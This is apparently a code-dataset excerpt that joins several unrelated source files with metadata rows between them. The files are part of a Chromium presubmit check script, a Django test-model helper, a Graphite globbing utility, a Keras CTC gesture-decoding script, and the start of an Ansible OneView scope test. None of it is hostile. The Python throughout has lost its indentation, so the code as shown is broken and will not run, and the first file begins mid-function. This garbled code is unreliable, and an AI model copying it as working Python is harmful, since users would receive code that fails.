"""Checks to make sure no files in libbase.a have |@interface|."""
pattern = input_api.re.compile(r'^\s*@interface', input_api.re.MULTILINE)
files = []
for f in input_api.AffectedSourceFiles(input_api.FilterSourceFile):
if (f.LocalPath().startswith('base/') and
not f.LocalPath().endswith('_unittest.mm')):
contents = input_api.ReadFile(f)
if pattern.search(contents):
files.append(f)
if len(files):
return [ output_api.PresubmitError(
'Objective-C interfaces or categories are forbidden in libbase. ' +
'See http://groups.google.com/a/chromium.org/group/chromium-dev/' +
'browse_thread/thread/efb28c10435987fd',
files) ]
return []
def _CheckNoProductionCodeUsingTestOnlyFunctions(input_api, output_api):
"""Attempts to prevent use of functions intended only for testing in
non-testing code. For now this is just a best-effort implementation
that ignores header files and may have some false positives. A
better implementation would probably need a proper C++ parser.
"""
# We only scan .cc files and the like, as the declaration of
# for-testing functions in header files are hard to distinguish from
# calls to such functions without a proper C++ parser.
source_extensions = r'\.(cc|cpp|cxx|mm)$'
file_inclusion_pattern = r'.+%s' % source_extensions
file_exclusion_patterns = (
r'.*[/\\](test_|mock_).+%s' % source_extensions,
r'.+_test_(support|base)%s' % source_extensions,
r'.+_(api|browser|perf|unit|ui)?test%s' % source_extensions,
r'.+profile_sync_service_harness%s' % source_extensions,
)
path_exclusion_patterns = (
r'.*[/\\](test|tool(s)?)[/\\].*',
# At request of folks maintaining this folder.
r'chrome[/\\]browser[/\\]automation[/\\].*',
)
base_function_pattern = r'ForTest(ing)?|for_test(ing)?'
inclusion_pattern = input_api.re.compile(r'(%s)\s*\(' % base_function_pattern)
exclusion_pattern = input_api.re.compile(
r'::[A-Za-z0-9_]+(%s)|(%s)[^;]+\{' % (
base_function_pattern, base_function_pattern))
def FilterFile(affected_file):
black_list = (file_exclusion_patterns + path_exclusion_patterns +
_EXCLUDED_PATHS + input_api.DEFAULT_BLACK_LIST)
return input_api.FilterSourceFile(
affected_file,
white_list=(file_inclusion_pattern, ),
black_list=black_list)
problems = []
for f in input_api.AffectedSourceFiles(FilterFile):
local_path = f.LocalPath()
lines = input_api.ReadFile(f).splitlines()
line_number = 0
for line in lines:
if (inclusion_pattern.search(line) and
not exclusion_pattern.search(line)):
problems.append(
'%s:%d\n %s' % (local_path, line_number, line.strip()))
line_number += 1
if problems:
if not input_api.is_committing:
return [output_api.PresubmitPromptWarning(_TEST_ONLY_WARNING, problems)]
else:
# We don't warn on commit, to avoid stopping commits going through CQ.
return [output_api.PresubmitNotifyResult(_TEST_ONLY_WARNING, problems)]
else:
return []
def _CheckNoIOStreamInHeaders(input_api, output_api):
"""Checks to make sure no .h files include <iostream>."""
files = []
pattern = input_api.re.compile(r'^#include\s*<iostream>',
input_api.re.MULTILINE)
for f in input_api.AffectedSourceFiles(input_api.FilterSourceFile):
if not f.LocalPath().endswith('.h'):
continue
contents = input_api.ReadFile(f)
if pattern.search(contents):
files.append(f)
if len(files):
return [ output_api.PresubmitError(
'Do not #include <iostream> in header files, since it inserts static ' +
'initialization into every file including the header. Instead, ' +
'#include <ostream>. See http://crbug.com/94794',
files) ]
return []
def _CheckNoNewWStrings(input_api, output_api):
"""Checks to make sure we don't introduce use of wstrings."""
problems = []
for f in input_api.AffectedFiles():
if (not f.LocalPath().endswith(('.cc', '.h')) or
f.LocalPath().endswith('test.cc')):
continue
for line_num, line in f.ChangedContents():
if 'wstring' in line:
problems.append(' %s:%d' % (f.LocalPath(), line_num))
if not problems:
return []
return [output_api.PresubmitPromptWarning('New code should not use wstrings.'
' If you are calling an API that accepts a wstring, fix the API.\n' +
'\n'.join(problems))]
def _CheckNoDEPSGIT(input_api, output_api):
"""Make sure .DEPS.git is never modified manually."""
if any(f.LocalPath().endswith('.DEPS.git') for f in
input_api.AffectedFiles()):
return [output_api.PresubmitError(
'Never commit changes to .DEPS.git. This file is maintained by an\n'
'automated system based on what\'s in DEPS and your changes will be\n'
'overwritten.\n'
'See http://code.google.com/p/chromium/wiki/UsingNewGit#Rolling_DEPS\n'
'for more information')]
return []
def _CheckNoFRIEND_TEST(input_api, output_api):
"""Make sure that gtest's FRIEND_TEST() macro is not used, the
FRIEND_TEST_ALL_PREFIXES() macro from base/gtest_prod_util.h should be used
instead since that allows for FLAKY_, FAILS_ and DISABLED_ prefixes."""
problems = []
file_filter = lambda f: f.LocalPath().endswith(('.cc', '.h'))
for f in input_api.AffectedFiles(file_filter=file_filter):
for line_num, line in f.ChangedContents():
if 'FRIEND_TEST(' in line:
problems.append(' %s:%d' % (f.LocalPath(), line_num))
if not problems:
return []
return [output_api.PresubmitPromptWarning('Chromium code should not use '
'gtest\'s FRIEND_TEST() macro. Include base/gtest_prod_util.h and use '
'FRIEND_TEST_ALL_PREFIXES() instead.\n' + '\n'.join(problems))]
def _CheckNoNewOldCallback(input_api, output_api):
"""Checks to make sure we don't introduce new uses of old callbacks."""
def HasOldCallbackKeywords(line):
"""Returns True if a line of text contains keywords that indicate the use
of the old callback system.
"""
return ('NewRunnableMethod' in line or
'NewCallback' in line or
input_api.re.search(r'\bCallback\d<', line) or
input_api.re.search(r'\bpublic Task\b', line) or
'public CancelableTask' in line)
problems = []
file_filter = lambda f: f.LocalPath().endswith(('.cc', '.h'))
for f in input_api.AffectedFiles(file_filter=file_filter):
if not any(HasOldCallbackKeywords(line) for line in f.NewContents()):
continue
for line_num, line in f.ChangedContents():
if HasOldCallbackKeywords(line):
problems.append(' %s:%d' % (f.LocalPath(), line_num))
if not problems:
return []
return [output_api.PresubmitPromptWarning('The old callback system is '
'deprecated. If possible, use base::Bind and base::Callback instead.\n' +
'\n'.join(problems))]
def _CommonChecks(input_api, output_api):
"""Checks common to both upload and commit."""
results = []
results.extend(input_api.canned_checks.PanProjectChecks(
input_api, output_api, excluded_paths=_EXCLUDED_PATHS))
results.extend(_CheckNoInterfacesInBase(input_api, output_api))
results.extend(_CheckAuthorizedAuthor(input_api, output_api))
results.extend(
_CheckNoProductionCodeUsingTestOnlyFunctions(input_api, output_api))
results.extend(_CheckNoIOStreamInHeaders(input_api, output_api))
results.extend(_CheckNoNewWStrings(input_api, output_api))
results.extend(_CheckNoDEPSGIT(input_api, output_api))
results.extend(_CheckNoFRIEND_TEST(input_api, output_api))
results.extend(_CheckNoNewOldCallback(input_api, output_api))
return results
def _CheckSubversionConfig(input_api, output_api):
"""Verifies the subversion config file is correctly setup.
Checks that autoprops are enabled, returns an error otherwise.
"""
join = input_api.os_path.join
if input_api.platform == 'win32':
appdata = input_api.environ.get('APPDATA', '')
if not appdata:
return [output_api.PresubmitError('%APPDATA% is not configured.')]
path = join(appdata, 'Subversion', 'config')
else:
home = input_api.environ.get('HOME', '')
if not home:
return [output_api.PresubmitError('$HOME is not configured.')]
path = join(home, '.subversion', 'config')
error_msg = (
'Please look at http://dev.chromium.org/developers/coding-style to\n'
'configure your subversion configuration file. This enables automatic\n'
'properties to simplify the project maintenance.\n'
'Pro-tip: just download and install\n'
'http://src.chromium.org/viewvc/chrome/trunk/tools/build/slave/config\n')
try:
lines = open(path, 'r').read().splitlines()
# Make sure auto-props is enabled and check for 2 Chromium standard
# auto-prop.
if (not '*.cc = svn:eol-style=LF' in lines or
not '*.pdf = svn:mime-type=application/pdf' in lines or
not 'enable-auto-props = yes' in lines):
return [
output_api.PresubmitNotifyResult(
'It looks like you have not configured your subversion config '
'file or it is not up-to-date.\n' + error_msg)
]
except (OSError, IOError):
return [
output_api.PresubmitNotifyResult(
'Can\'t find your subversion config file.\n' + error_msg)
]
return []
def _CheckAuthorizedAuthor(input_api, output_api):
"""For non-googler/chromites committers, verify the author's email address is
in AUTHORS.
"""
# TODO(maruel): Add it to input_api?
import fnmatch
author = input_api.change.author_email
if not author:
input_api.logging.info('No author, skipping AUTHOR check')
return []
authors_path = input_api.os_path.join(
input_api.PresubmitLocalPath(), 'AUTHORS')
valid_authors = (
input_api.re.match(r'[^#]+\s+\<(.+?)\>\s*$', line)
for line in open(authors_path))
valid_authors = [item.group(1).lower() for item in valid_authors if item]
if input_api.verbose:
print 'Valid authors are %s' % ', '.join(valid_authors)
if not any(fnmatch.fnmatch(author.lower(), valid) for valid in valid_authors):
return [output_api.PresubmitPromptWarning(
('%s is not in AUTHORS file. If you are a new contributor, please visit'
'\n'
'http://www.chromium.org/developers/contributing-code and read the '
'"Legal" section\n'
'If you are a chromite, verify the contributor signed the CLA.') %
author)]
return []
def CheckChangeOnUpload(input_api, output_api):
results = []
results.extend(_CommonChecks(input_api, output_api))
return results
def CheckChangeOnCommit(input_api, output_api):
results = []
results.extend(_CommonChecks(input_api, output_api))
# TODO(thestig) temporarily disabled, doesn't work in third_party/
#results.extend(input_api.canned_checks.CheckSvnModifiedDirectories(
# input_api, output_api, sources))
# Make sure the tree is 'open'.
# TODO(tedbo): Re-enable tree open/close and trybot checks when we have
# buildbots and trybots.
# results.extend(input_api.canned_checks.CheckTreeIsOpen(
# input_api,
# output_api,
# json_url='http://chromium-status.appspot.com/current?format=json'))
# results.extend(input_api.canned_checks.CheckRietveldTryJobExecution(input_api,
# output_api, 'http://codereview.chromium.org',
# ('win_rel', 'linux_rel', 'mac_rel'), '[email protected]'))
results.extend(input_api.canned_checks.CheckChangeHasBugField(
input_api, output_api))
results.extend(input_api.canned_checks.CheckChangeHasTestField(
input_api, output_api))
results.extend(input_api.canned_checks.CheckChangeHasDescription(
input_api, output_api))
#Branch doesn't push to SVN, no need for this check
#results.extend(_CheckSubversionConfig(input_api, output_api))
return results
def GetPreferredTrySlaves(project, change):
only_objc_files = all(
f.LocalPath().endswith(('.mm', '.m')) for f in change.AffectedFiles())
if only_objc_files:
return ['mac_rel']
preferred = ['win_rel', 'linux_rel', 'mac_rel']
aura_re = '_aura[^/]*[.][^/]*'
if any(re.search(aura_re, f.LocalPath()) for f in change.AffectedFiles()):
preferred.append('linux_chromeos_aura:compile')
return preferred
| bsd-3-clause | 8,264,440,543,859,224,000 | 37.396552 | 82 | 0.66966 | false |
unt-libraries/catalog-api | django/sierra/utils/test_helpers/orm.py | 1 | 5271 | """
Contains test helpers for managing ORM test models and such.
"""
import os
from collections import OrderedDict
from django.db import models
from django.core import management
from django.db import connections, OperationalError
from django.conf import settings
class AppModelsEnvironment(object):
"""
Class for creating and managing a set of model classes for testing.
    Create a model class using `make`. That class is added to
    self.models, an OrderedDict, and can be accessed there. For example,
    if this environment object is `modelset` and one of the created
    classes is MyModel, it can be accessed via modelset.models['MyModel'].
    Destroy a model class, remove it from this environment, and remove it
    from the Django apps registry using `delete`.
    Destroy all model classes in this environment using `clear`.
    Sync the database using `migrate`. Migrations are created and applied
    via the admin commands (makemigrations, migrate), depending on the
    current state of the models.
Use `reset` to roll back and clear migrations for the entire app.
Use `close` to completely roll back changes made by creating models
this way--it calls `reset` and then `clear`.
This is also a context manager object, so, when used in a `with`
block, it calls `close` for you afterward.
"""
def __init__(self, modulename, modulepath, modeltype=models.Model,
using='default'):
self.models = OrderedDict()
self.modulename = modulename
self.modulepath = modulepath
self.modeltype = modeltype
self.connection = connections[using]
def __enter__(self):
self.reset()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def _get_migration_file_info(self):
"""
Get the filenames of all migration files for the app the models
on this object belong to, along with the absolute path to the
migration directory. Returns a tuple: (migfnames, migdirpath)
"""
def is_migration(filename):
if not filename.startswith('__'):
if filename.endswith('.py') or filename.endswith('.pyc'):
return True
return False
moddirpath = os.path.join(*self.modulepath.split('.'))
migdirpath = os.path.join(settings.PROJECT_DIR, moddirpath,
'migrations')
migfnames = [fn for fn in os.listdir(migdirpath) if is_migration(fn)]
return (migfnames, migdirpath)
def make(self, name, fields, modeltype=None, meta_options=None):
"""
Return a new test model class. Pass in the test model's name
via `name` and a dict of fields to create via `fields`. The
model will be a base class of self.modeltype by default, or you
may pass in a custom type via `modeltype`. Any special meta
options you need can be passed as a dict via `meta_options`.
"""
params = fields
modeltype = modeltype or self.modeltype
params['__module__'] = self.modulepath
if meta_options:
params['Meta'] = type('Meta', (object,), meta_options)
new_model = type(name, (modeltype,), params)
self.models[name] = new_model
return new_model
def delete(self, name):
"""
Destroy one of the registered test models you created, by name.
"""
model = self.models[name]
apps = model._meta.apps
model_name = model._meta.model_name
try:
del(apps.all_models[self.modulename][model_name])
except KeyError:
pass
del(model)
apps.clear_cache()
del(self.models[name])
def clear(self):
"""
Destroy all registered test models created via this factory.
"""
for name in self.models.keys():
self.delete(name)
def migrate(self):
"""
Create and run migrations to sync the DB with the current model
state.
"""
management.call_command('makemigrations', self.modulename, verbosity=0,
interactive=False)
management.call_command('migrate', self.modulename, verbosity=0,
interactive=False)
def reset(self):
"""
Reset migration states for the app this object represents.
Resets migration history and deletes all migration files.
"""
try:
management.call_command('migrate', self.modulename, 'zero',
verbosity=0, interactive=False)
except OperationalError:
# If DB tables from a previous run have been deleted, the
# above attempt to migrate will error out. In that case,
# just back the migration history up to zero.
management.call_command('migrate', self.modulename, 'zero',
verbosity=0, interactive=False, fake=True)
migfnames, migdirpath = self._get_migration_file_info()
for migfname in migfnames:
os.remove(os.path.join(migdirpath, migfname))
def close(self):
self.reset()
self.clear()
| bsd-3-clause | 6,047,544,646,794,864,000 | 35.351724 | 79 | 0.616771 | false |
dpanth3r/biggraphite | biggraphite/glob_utils.py | 1 | 15872 | #!/usr/bin/env python
# Copyright 2016 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Globbing utility module."""
from enum import Enum
import itertools
import re
# http://graphite.readthedocs.io/en/latest/render_api.html#paths-and-wildcards
_GRAPHITE_GLOB_RE = re.compile(r"^[^*?{}\[\]]+$")
def _is_graphite_glob(metric_component):
"""Return whether a metric component is a Graphite glob."""
return _GRAPHITE_GLOB_RE.match(metric_component) is None
def _is_valid_glob(glob):
"""Check whether a glob pattern is valid.
It does so by making sure it has no dots (path separator) inside groups,
and that the grouping braces are not mismatched. This helps doing useless
(or worse, wrong) work on queries.
Args:
glob: Graphite glob pattern.
Returns:
True if the glob is valid.
"""
depth = 0
for c in glob:
if c == '{':
depth += 1
elif c == '}':
depth -= 1
if depth < 0:
# Mismatched braces
return False
elif c == '.':
if depth > 0:
# Component separator in the middle of a group
return False
# We should have exited all groups at the end
return depth == 0
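# Illustrative behaviour of _is_valid_glob (hypothetical patterns):
#   _is_valid_glob('a.{b,c}.d')  -> True
#   _is_valid_glob('a.{b.c}')    -> False (path separator inside a group)
#   _is_valid_glob('a.{b,c')     -> False (mismatched braces)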
class TokenType(Enum):
"""Represents atomic types used to tokenize Graphite globbing patterns."""
PATH_SEPARATOR = 0
LITERAL = 1
WILD_CHAR = 2
WILD_SEQUENCE = 3
WILD_PATH = 4
CHAR_SELECT_BEGIN = 5
CHAR_SELECT_NEGATED_BEGIN = 6
CHAR_SELECT_RANGE_DASH = 7
CHAR_SELECT_END = 8
EXPR_SELECT_BEGIN = 9
EXPR_SELECT_SEPARATOR = 10
EXPR_SELECT_END = 11
def tokenize(glob):
"""Convert a glob expression to a stream of tokens.
Tokens have the form (type: TokenType, data: String).
Args:
glob: Graphite glob pattern.
Returns:
Iterator on a token stream.
"""
SPECIAL_CHARS = '.?*[-]{,}'
is_escaped = False
is_char_select = False
tmp = ""
token = None
i = -1
while i+1 < len(glob):
i += 1
c = glob[i]
# Literal handling
if is_escaped:
tmp += c
is_escaped = False
continue
elif c == '\\':
is_escaped = True
continue
elif c not in SPECIAL_CHARS or (c == '-' and not is_char_select):
if token and token != TokenType.LITERAL:
yield token, None
token, tmp = TokenType.LITERAL, ""
token = TokenType.LITERAL
tmp += c
continue
elif token:
yield token, tmp
token, tmp = None, ""
# Special chars handling
if c == '.':
yield TokenType.PATH_SEPARATOR, ""
elif c == '?':
yield TokenType.WILD_CHAR, ""
elif c == '*':
# Look-ahead for wild path (globstar)
if i+1 < len(glob) and glob[i+1] == '*':
i += 1
yield TokenType.WILD_PATH, ""
else:
yield TokenType.WILD_SEQUENCE, ""
elif c == '[':
is_char_select = True
# Look-ahead for negated selector (not in)
if i+1 < len(glob) and glob[i+1] == '!':
i += 1
yield TokenType.CHAR_SELECT_NEGATED_BEGIN, ""
else:
yield TokenType.CHAR_SELECT_BEGIN, ""
elif c == '-':
yield TokenType.CHAR_SELECT_RANGE_DASH, ""
elif c == ']':
is_char_select = False
yield TokenType.CHAR_SELECT_END, ""
elif c == '{':
yield TokenType.EXPR_SELECT_BEGIN, ""
elif c == ',':
yield TokenType.EXPR_SELECT_SEPARATOR, ""
elif c == '}':
yield TokenType.EXPR_SELECT_END, ""
else:
raise Exception("Unexpected character '%s'" % c)
# Do not forget trailing token, if any
if token:
yield token, tmp
def _glob_to_regex(glob):
"""Convert a Graphite globbing pattern into a regular expression.
This function does not check for glob validity, if you want usable regexes
then you must check _is_valid_glob() first.
Uses _tokenize() to obtain a token stream, then does simple substitution
from token type and data to equivalent regular expression.
It handles * as being anything except a dot.
It returns a regex that only matches whole strings (i.e. ^regex$).
Args:
glob: Valid Graphite glob pattern.
Returns:
Regex corresponding to the provided glob.
"""
ans = ""
for token, data in tokenize(glob):
if token == TokenType.PATH_SEPARATOR:
ans += re.escape('.')
elif token == TokenType.LITERAL:
ans += re.escape(data)
elif token == TokenType.WILD_CHAR:
ans += "."
elif token == TokenType.WILD_SEQUENCE:
ans += "[^.]*"
elif token == TokenType.WILD_PATH:
ans += ".*"
elif token == TokenType.CHAR_SELECT_BEGIN:
ans += "["
elif token == TokenType.CHAR_SELECT_NEGATED_BEGIN:
ans += "[^"
elif token == TokenType.CHAR_SELECT_RANGE_DASH:
ans += "-"
elif token == TokenType.CHAR_SELECT_END:
ans += "]"
elif token == TokenType.EXPR_SELECT_BEGIN:
ans += "("
elif token == TokenType.EXPR_SELECT_SEPARATOR:
ans += "|"
elif token == TokenType.EXPR_SELECT_END:
ans += ")"
else:
raise Exception("Unexpected token type '%s' with data '%s'" % (token, data))
return '^' + ans + '$'
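# Illustrative conversion (hypothetical metric names): for the glob
# 'servers.*.cpu-{user,system}', _glob_to_regex produces a regex
# equivalent to ^servers\.[^.]*\.cpu\-(user|system)$, which matches
# 'servers.web01.cpu-user' but not 'servers.web01.db.cpu-user', since
# '*' never crosses the '.' path separator.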
def glob(metric_names, glob_pattern):
"""Pre-filter metric names according to a glob expression.
Uses the dot-count and the litteral components of the glob to filter
guaranteed non-matching values out, but may still require post-filtering.
Args:
metric_names: List of metric names to be filtered.
glob_pattern: Glob pattern.
Returns:
List of metric names that may be matched by the provided glob.
"""
glob_components = glob_pattern.split(".")
globstar = None
prefix_literals = []
suffix_literals = []
for (index, component) in enumerate(glob_components):
if component == "**":
globstar = index
elif globstar:
# Indexed relative to the end because globstar length is arbitrary
suffix_literals.append((len(glob_components) - index, component))
elif not _is_graphite_glob(component):
prefix_literals.append((index, component))
def maybe_matched_prefilter(metric):
metric_components = metric.split(".")
if globstar:
if len(metric_components) < len(glob_components):
return False
elif len(metric_components) != len(glob_components):
return False
for (index, value) in itertools.chain(suffix_literals, prefix_literals):
if metric_components[index] != value:
return False
return True
return filter(maybe_matched_prefilter, metric_names)
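# Illustrative pre-filtering (hypothetical metric names):
#   glob(['a.b.c', 'a.x.c', 'a.b'], 'a.*.c') keeps 'a.b.c' and 'a.x.c';
# 'a.b' is discarded early because its component count cannot match.
# The survivors may still require post-filtering against the full regex.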
def graphite_glob(accessor, graphite_glob, metrics=True, directories=True):
"""Get metrics and directories matching a Graphite glob.
Args:
accessor: BigGraphite accessor
graphite_glob: Graphite glob expression
metrics: True if metrics should be fetched
directories: True if directories should be fetched
Returns:
A tuple:
First element: sorted list of Cassandra metrics matched by the glob.
Second element: sorted list of Cassandra directories matched by the glob.
"""
if not _is_valid_glob(graphite_glob):
# TODO(d.forest): should we instead raise an exception?
return ([], [])
glob_re = re.compile(_glob_to_regex(graphite_glob))
if metrics:
metrics = accessor.glob_metric_names(graphite_glob)
metrics = filter(glob_re.match, metrics)
else:
metrics = []
if directories:
directories = accessor.glob_directory_names(graphite_glob)
directories = filter(glob_re.match, directories)
else:
directories = []
return (metrics, directories)
class GlobExpression:
"""Base class for glob expressions."""
def __repr__(self):
return self.__class__.__name__
def __eq__(self, other):
return self.__class__ == other.__class__
class GlobExpressionWithValues(GlobExpression):
"""Base class for glob expressions that have values."""
def __init__(self, values):
"""Take a list of values, and stores the sorted unique values."""
self.values = sorted(set(values))
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self.values)
def __eq__(self, other):
return (GlobExpression.__eq__(self, other) and
self.values == other.values)
class Globstar(GlobExpression):
"""Represents a globstar wildcard."""
pass
class AnyChar(GlobExpression):
"""Represents any single character."""
pass
class AnySequence(GlobExpression):
"""Represents any sequence of 0 or more characters."""
pass
class SequenceIn(GlobExpressionWithValues):
"""Represents a choice between different character sequences."""
pass
class GraphiteGlobParser:
"""Utility class for parsing graphite glob expressions."""
# TODO(d.forest): upgrade to new tokenizer here
# TODO(d.forest): after upgrade, try to improve Cassandra query generation
def __init__(self):
"""Build a parser, fill in default values."""
self._reset('')
def _commit_sequence(self):
if len(self._sequence) > 0:
self._component.append(self._sequence)
self._sequence = ''
def _commit_component(self):
self._commit_sequence()
if len(self._component) > 0:
self._parsed.append(self._component)
self._component = []
def _parse_char_wildcard(self):
"""Parse single character wildcard."""
self._commit_sequence()
self._component.append(AnyChar())
def _parse_wildcard(self, i, n):
"""Parse multi-character wildcard, and globstar."""
self._commit_sequence()
# Look-ahead for potential globstar
if i < n and self._glob[i] == '*':
self._commit_component()
self._parsed.append(Globstar())
i += 1
else:
self._component.append(AnySequence())
return i
def _find_char_selector_end(self, i, n):
"""Find where a character selector expression ends."""
j = i
if j < n and self._glob[j] == '!':
j += 1
if j < n and self._glob[j] == ']':
j += 1
j = self._glob.find(']', j)
if j == -1:
return n
return j
def _parse_char_selector(self, i, n):
"""Parse character selector, with support for negation and ranges.
For simplicity (and because it does not seem useful at the moment) we
will not be generating the possible values or parsing the ranges, but
outputting AnyChar on valid char selector expressions.
"""
j = self._find_char_selector_end(i, n)
if j < n:
# +1 to skip closing bracket
i = j + 1
self._commit_sequence()
self._component.append(AnyChar())
else:
# Reached end of string: unbalanced bracket
self._sequence += '['
return i
def _parse_sequence_selector(self, i, n):
"""Parse character sequence selector, with support for nesting.
For simplicity, we will be outputting AnySequence in situations where
values contain a character selector.
"""
result = self._parse_sequence_selector_values(i, n)
if result:
has_char_selector, i, values = result
if not has_char_selector and len(values) == 1:
self._sequence += values[0]
else:
if has_char_selector:
seq = AnySequence()
else:
seq = SequenceIn(values)
self._commit_sequence()
self._component.append(seq)
else:
self._sequence += '{'
return i
def _parse_sequence_selector_values(self, i, n):
has_char_selector = False
values = []
curr = []
tmp = ''
j = i
c = ''
while j < n and c != '}':
c = self._glob[j]
j += 1
# Parse sub-expression then combine values with prefixes.
if c == '{':
if tmp != '':
curr.append(tmp)
tmp = ''
result = self._parse_sequence_selector_values(j, n)
if not result:
return None
has_charsel, j, subvalues = result
has_char_selector = has_char_selector or has_charsel
curr = [prefix + x for prefix in curr for x in subvalues]
# End of current element, combine values with suffix.
elif c == ',' or c == '}':
if len(curr) > 0:
values += [x + tmp for x in curr]
else:
values.append(tmp)
curr = []
tmp = ''
# Simplified handling of char selector
elif c == '[':
# XXX(d.forest): We could keep track of depth and just make sure
# the selector expression is well-formed instead
# of continuing to parse everything.
# This is open for later improvement.
k = self._find_char_selector_end(j, n)
if k < n:
has_char_selector = True
j = k + 1
else:
tmp += '['
# Reject dots inside selectors
elif c == '.':
return None
# Append char to the current value.
else:
tmp += c
# We have reached the end without finding a closing brace: the braces
# are unbalanced, expression cannot be parsed as a sequence selector.
if j == n and c != '}':
return None
return has_char_selector, j, values + curr
def _reset(self, glob):
self._glob = glob
self._parsed = []
self._component = []
self._sequence = ''
def parse(self, glob):
"""Parse a graphite glob expression into simple components."""
self._reset(glob)
i = 0
n = len(self._glob)
while i < n:
c = self._glob[i]
i += 1
if c == '?':
self._parse_char_wildcard()
elif c == '*':
i = self._parse_wildcard(i, n)
elif c == '[':
i = self._parse_char_selector(i, n)
elif c == '{':
i = self._parse_sequence_selector(i, n)
elif c == '.':
self._commit_component()
else:
self._sequence += c
self._commit_component()
return self._parsed
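# Illustrative parse result (hypothetical pattern):
#   GraphiteGlobParser().parse('a.b*.{c,d}')
#   -> [['a'], ['b', AnySequence()], [SequenceIn(['c', 'd'])]]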
| apache-2.0 | -4,000,647,928,094,152,000 | 29.75969 | 88 | 0.550718 | false |
AlexGidiotis/Multimodal-Gesture-Recognition-with-LSTMs-and-CTC | multimodal_fusion/sequence_decoding.py | 1 | 3585 |
import pandas as pd
import numpy as np
from operator import itemgetter
from itertools import groupby
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.models import model_from_json
from keras import backend as K
from keras.optimizers import RMSprop
import keras.callbacks
from keras.layers import Input, Lambda
from keras.models import Model
import itertools
from sklearn import preprocessing
from data_generator import DataGenerator
from losses import ctc_lambda_func
def decode_batch(pred_out, f_list):
	"""Greedy (best-path) decoding of the CTC softmax output.

	Keeps only frames predicted with probability of at least 0.5,
	collapses consecutive repeated labels, maps the label codes to
	gesture classes and writes the recognised sequences to an HTK-style
	.mlf file. Returns the list of decoded label sequences, one per
	batch item.
	"""
# Map gesture codes to classes.
map_gest = {0:"oov", 1:"VA", 2:"VQ", 3:"PF", 4:"FU", 5:"CP", 6:"CV",
7:"DC", 8:"SP", 9:"CN", 10:"FN", 11:"OK", 12:"CF", 13:"BS",
14:"PR", 15:"NU", 16:"FM", 17:"TT", 18:"BN", 19:"MC",
20:"ST", 21:"sil"}
# These files are problematic during decoding.
ignore_list = [228,298,299,300,303,304,334,343,373,375]
# Write the output to .mlf
of = open('final_ctc_recout.mlf', 'w')
of.write('#!MLF!#\n')
out = pred_out
ret = []
for j in range(out.shape[0]):
out_prob = list(np.max(out[j, 2:],1))
out_best = list(np.argmax(out[j, 2:],1))
# Filter the probabilities to get the most confident predictions.
for p,s in zip(out_prob,out_best):
if p < 0.5:
out_prob.remove(p)
out_best.remove(s)
out_best = [k for k, g in itertools.groupby(out_best)]
outstr = [map_gest[i] for i in out_best]
ret.append(outstr)
f_num = f_list[j]
if int(f_num) in ignore_list:
continue
fileNum = str(format(f_num, '05'))
fileName = 'Sample'+fileNum
of.write('"*/%s.rec"\n' %fileName)
for cl in outstr:
of.write('%s\n' %cl)
of.write('.\n')
of.close()
return ret
if __name__ == '__main__':
minibatch_size = 2
maxlen = 1900
nb_classes = 22
nb_epoch = 100
numfeats_speech = 39
numfeats_skeletal = 20
K.set_learning_phase(0)
dataset = raw_input('select train or val: ')
data_gen = DataGenerator(minibatch_size=minibatch_size,
numfeats_speech=numfeats_speech,
numfeats_skeletal=numfeats_skeletal,
maxlen=maxlen,
nb_classes=nb_classes,
dataset=dataset)
input_shape_a = (maxlen, numfeats_speech)
input_shape_s = (maxlen, numfeats_skeletal)
input_data_a = Input(name='the_input_audio', shape=input_shape_a, dtype='float32')
input_data_s = Input(name='the_input_skeletal', shape=input_shape_s, dtype='float32')
json_file = open('multimodal_ctc_blstm_model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
loaded_model.load_weights("multimodal_ctc_lstm_weights_best.h5")
print("Loaded model from disk")
y_pred = loaded_model.get_layer('softmax').output
labels = Input(name='the_labels', shape=[data_gen.absolute_max_sequence_len], dtype='float32')
input_length = Input(name='input_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name="ctc")([y_pred, labels, input_length, label_length])
rmsprop = RMSprop(lr=0.001, clipnorm=5)
# the loss calc occurs elsewhere, so use a dummy lambda func for the loss
loaded_model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=rmsprop)
pred_model = Model(inputs=loaded_model.input,
outputs=loaded_model.get_layer('softmax').output)
predictions = pred_model.predict_generator(generator=data_gen.next_val(),
steps=data_gen.get_size(train=False)/minibatch_size,
verbose=1)
f_list = data_gen.get_file_list(train=False)
decoded_res = decode_batch(predictions, f_list)
| mit | 6,923,407,496,692,858,000 | 27.228346 | 112 | 0.68954 | false |
HewlettPackard/oneview-ansible | test/test_oneview_scope.py | 1 | 11066 | #!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2020) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import copy
import mock
import pytest
from hpe_test_utils import OneViewBaseTest
from oneview_module_loader import ScopeModule
FAKE_MSG_ERROR = 'Fake message error'
RESOURCE = dict(name='ScopeName', uri='/rest/scopes/id')
RESOURCE_UPDATED = dict(name='ScopeNameRenamed', uri='/rest/scopes/id')
RESOURCE_ASSIGNMENTS = dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-4'])
PARAMS_FOR_PRESENT = dict(
config='config.json',
state='present',
data=dict(name='ScopeName')
)
PARAMS_WITH_CHANGES = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
newName='ScopeNameRenamed')
)
PARAMS_WITH_CHANGES_HAVING_RESOURCES_1 = dict(
config='config.json',
state='present',
